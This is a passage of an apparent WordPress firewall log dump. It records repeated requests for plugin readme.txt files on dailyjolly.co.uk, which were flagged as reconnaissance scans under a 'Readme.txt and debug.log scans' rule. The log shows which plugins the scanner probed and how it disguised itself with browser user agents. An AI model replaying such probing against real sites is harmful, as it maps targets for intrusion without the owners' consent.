scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12489,1674982910.957540,1674982910.847100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12490,1674982910.663465,1674982910.541600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12491,1674982910.663344,1674982910.541600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12492,1674982932.075470,1674982931.919000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12493,1674982932.075349,1674982931.919000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12494,1674982932.709618,1674982932.594000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12495,1674982932.709508,1674982932.594000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbHBoYWJldGljLXBhZ2luYXRpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12496,1674982960.246765,1674982960.112900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12497,1674982960.246645,1674982960.112900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12498,1674982955.126566,1674982955.019000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12499,1674982955.126468,1674982955.019000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12500,1674982954.822957,1674982954.700900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12501,1674982954.822827,1674982954.700900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12502,1674982977.456277,1674982977.334700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12503,1674982977.456162,1674982977.334700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12504,1674982966.860805,1674982966.598000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12505,1674982966.860706,1674982966.598000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12506,1674982966.354350,1674982966.107500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12507,1674982966.354209,1674982966.107500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/jobboardwp/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qb2Jib2FyZHdwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12508,1674982960.975301,1674982960.822000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12509,1674982960.975192,1674982960.822000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mstore-api/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12510,1674982983.659361,1674982983.548400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12511,1674982983.659224,1674982983.548400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12512,1674982983.355422,1674982983.232800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12513,1674982983.355305,1674982983.232800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-booking/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1ib29raW5nL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12514,1674982978.148294,1674982978.036300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12515,1674982978.148175,1674982978.036300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-restaurant-reservations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1yZXN0YXVyYW50LXJlc2VydmF0aW9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12516,1674983007.234059,1674983007.111800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12517,1674983007.233936,1674983007.111800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12518,1674983024.425143,1674983024.295800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12519,1674983024.425023,1674983024.295800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12520,1674983007.820995,1674983007.705300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12521,1674983007.820880,1674983007.705300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12522,1674983041.352015,1674983041.229600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log 